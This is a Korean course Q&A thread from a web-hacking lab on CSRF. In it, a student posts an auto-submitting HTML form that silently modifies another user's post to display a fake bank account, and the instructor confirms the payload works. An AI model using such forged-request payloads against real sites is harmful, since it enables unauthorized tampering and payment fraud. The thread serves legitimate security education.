인프런 커뮤니티 질문&답변

뭐라고그게님의 프로필 이미지
뭐라고그게

작성한 질문수

웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩

[실습6-1] CSRF 공격을 통한 게시글 무단 작성,수정,삭제 실습

무단 수정에서

해결된 질문

작성

·

199

1

<body onload="document.forms[0].submit()">

<form action="http://아이피/insecure_website/action.php" method="POST" enctype="multipart/form-data">

<input type="hidden" name="title" value="계좌번호 정보입니다.">

<input type="hidden" name="content" value="* 은행 : 와우 은행
* 예금주 : 해커
* 계좌번호 : 1111-1111-2222">

<input type="hidden" name="password" value="a">

<input type="hidden" name="idx" value="43">

<input type="hidden" name="mode" value="modify">

<input type="submit">

</form>

</body>

했는데 계속 잘못된 요청이라고 뜨는데 혹시 작성이 잘못된 걸까요..?

모의해킹인젝션

답변 3

1

뭐라고그게님의 프로필 이미지
뭐라고그게
질문자

해결 하였습니다 저도 vm을 사용해서 똑같이 실습하는데 

vm에 있는 코드를 사용자 쪽에 넣어보니깐 다 정상적으로 작동하네요 아마 코드의 문제 였던 것 같습니다. 

감사합니다.

1

크리핵티브님의 프로필 이미지
크리핵티브
지식공유자

음...

공격 페이로드 자체는 문제가 없는데,

잘못된 요청이라고 출력되는게 경고창으로 출력이 되나요???

혹시 스크린샷 첨부 가능할까요?

그리고 저 스크립트를 게시하고 읽을 때 스크립트가 동작하는지 확인도 부탁드리겠습니다.

정확한 상황을 몰라서 체크를 해봐야할 듯 하네요.

0

크리핵티브님의 프로필 이미지
크리핵티브
지식공유자

아 다행이네요! 화이팅하세요!

뭐라고그게님의 프로필 이미지
뭐라고그게

작성한 질문수

전체 Q&A
질문하기